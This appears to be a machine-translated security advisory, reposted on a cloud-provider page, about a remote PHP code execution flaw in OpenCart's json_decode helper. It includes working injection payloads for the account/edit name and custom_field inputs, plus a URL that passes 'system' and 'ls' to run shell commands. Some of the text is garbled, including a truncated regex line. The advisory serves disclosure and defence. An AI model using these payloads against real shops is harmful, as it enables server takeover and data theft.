The OpenCartjson_decode function has the remote PHP code execution vulnerability.

Source: Internet
Author: User
Tags php json
The OpenCartjson_decode function has the remote PHP code execution vulnerability 14:12:56 Source: 360 Security broadcast author: dark Yow reading: 103

Share:

Recently, security researchers Naser Farhadi (Twitter: @ naserfarhadi) discovered a remote PHP code execution vulnerability in the OpenCart json_decode function, involving versions 2.1.0.2 to 2.2.0.0 (latest version)

The vulnerability exists in/upload/system/helper/json. php.

#/Upload/system/helper/json. php $ match = '/".*? (?
     

The function is created through json, and the json_decode function can be used

Here are a few simple test examples

Var_dump (json_decode ('{"OK": "1". "2". "3 "}'));

Var_dump (json_decode ('{"OK": "$ _ SERVER [HTTP_USER_AGENT]"}');

Var_dump (json_decode ('{"OK": "{$ _ GET [B] ($ _ GET [c])}"}');

In real scenarios, you can use/index. php? Route = account/edit

For example, enter $ _ SERVER [HTTP_USER_AGENT] as the name and save it (repeat twice)

Then, when the administrator accesses the management panel, he will see his UserAgent in the area where your name should be displayed in the latest activity.

Another example is custom_field in account/edit or account/register, which may be the most suitable

If the administrator is in/admin/index. php? Route = customer/custom_field adds a custom region for additional information such as phone numbers.

You can directly inject your code in this custom_field

For example, enter {$ _ GET [B] ($ _ GET [c])} in this custom_field and save

Then access

Http: // host/shop_directory/index. php? Route = account/edit & B = system & c = ls

You will see that the code is correctly executed

Note that this method is only valid when php json extension is not installed.

This article is translated by 360 security broadcasting.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.